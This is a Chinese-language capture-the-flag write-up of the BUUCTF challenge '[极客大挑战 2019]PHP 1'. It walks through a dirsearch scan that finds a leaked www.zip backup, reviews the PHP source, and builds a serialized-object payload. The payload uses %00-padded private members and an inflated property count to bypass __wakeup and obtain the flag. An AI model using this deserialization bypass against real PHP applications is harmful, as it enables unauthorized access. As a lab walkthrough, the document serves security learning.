[极客大挑战 2019]PHP 1

题目环境:
[极客大挑战 2019]PHP 1_第1张图片

注意这四个字“备份网站”,让我想到了之前自己做网站的时候,有一次上传FTP网站文件,不小心把全部网站文件清空了,我伤心欲绝没有做网站备份文件,自此以后我就把网站文件在本地备份了一份,每更新网站有一次就在本地备份一次,备份格式是ZIP格式,比较节省空间,所以我这猜测它网站后台必定又一个网站备份ZIP文件

使用dirsearch工具扫描网站后台(这个工具是我最喜欢的,扫描的比较全面,大部分都可以扫描到,博主有压缩文件可以私聊我进行领取!)
python dirsearch.py -u http://a02fc32b-1091-4b95-a4a1-27fb1bc51ba1.node4.buuoj.cn:81/
[极客大挑战 2019]PHP 1_第2张图片
回车
[极客大挑战 2019]PHP 1_第3张图片
大概需要好几分钟(需耐心等待)
扫描出www.zip压缩文件
[极客大挑战 2019]PHP 1_第4张图片
下载www.zip文件
[极客大挑战 2019]PHP 1_第5张图片
回车进行下载
[极客大挑战 2019]PHP 1_第6张图片
假的flag文件
[极客大挑战 2019]PHP 1_第7张图片
查看index.php文件
[极客大挑战 2019]PHP 1_第8张图片

发现参数select(通过GET方式进行传参)
unserialize反序列化

查看class.php文件
[极客大挑战 2019]PHP 1_第9张图片
一道反序列化题目(相对简单的反序列化题目)

PHP魔法函数以及其他函数的理解可以看这两篇文章:https://blog.csdn.net/m0_73734159/article/details/133854073?spm=1001.2014.3001.5502
https://blog.csdn.net/m0_73734159/article/details/130661423?spm=1001.2014.3001.5502
private私有变量,对象和变量名前需要用%00进行绕过
wakeup魔法函数,只需要大于实际变量数即可绕过,比如本题中有两个变量username和password,所以序列化就是O:4:“Name”:2:,O对象名,4就是Name是4个字符,2就是Name对象里面有两个变量,大于实际变量数即可绕过O:4:“Name”:3:
var_dump函数显示关于一个或多个表达式的结构信息,包括表达式的类型与值。数组将递归展开值,通过缩进显示其结构。

想要于万军之中取flag首级(只须满足两个条件)

[极客大挑战 2019]PHP 1_第10张图片
1、满足password=100
2、满足username=‘admin’

构造exp(取关键代码进行构造)
[极客大挑战 2019]PHP 1_第11张图片


  class Name
{
  private $username = 'nonono';
  private $password = 'yesyes';

public function __construct($username, $password)
  {
    $this->username = $username;
    $this->password = $password;
  }
}
$flag=new Name('admin',100);
var_dump(serialize($flag));
?>

payload:
image.pngO:4:"Name":2:{s:14:"\000Name\000username";s:5:"admin";s:14:"\000Name\000password";i:100;}
绕过private和wakeup
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
最终payload:
?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
上传payload:
[极客大挑战 2019]PHP 1_第12张图片
得到flag:
flag{5750f1c4-ad75-42cf-9bd2-79e668cfc3a4}

你可能感兴趣的:(CTF做题笔记,php,android,开发语言,网络安全,web安全)